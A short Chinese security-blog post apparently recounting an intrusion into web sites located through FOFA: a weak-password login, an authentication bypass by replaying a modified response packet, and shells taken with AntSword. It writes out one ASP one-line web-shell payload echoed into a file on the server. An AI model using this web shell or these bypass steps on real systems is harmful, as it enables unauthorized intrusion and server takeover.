标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3055] 作者: 州官 发表于: [2022-03-30]
本文共 [484] 位读者顶过
利用fofa搜索有没有可以利用的站点,然后正好发现了一个弱口令,弱口令yyds。[出自:jiwo.org]
首先,先不急着打后台先研究登陆框这边有没有什么漏洞
打开另一站点 返回包直接修改成刚刚复制下来的返回包
原来在返回包处 存在两个调动数据库名称的地方 正常情况下是都不会知道数据库名称的 不过运气很好 他把数据库名称直接写在了URL的参数里且明文传输 修改之后 成功登录进来 使用蚁剑一键连接 成功的拿到shell
再看看有没有的其他的漏洞 毕竟功能点很多 写入shell echo "<%eval request("10sec")%>“ >> D:\1.asp 执行成功 路径由于刚刚文件上传所以已经知道了
同样使蚁剑一键连接 又拿下一个shell
直接登录绕过了 这确实意想不到 拿到其他站点通用可以 还免下修改数据的包的功夫可以直接登陆了 |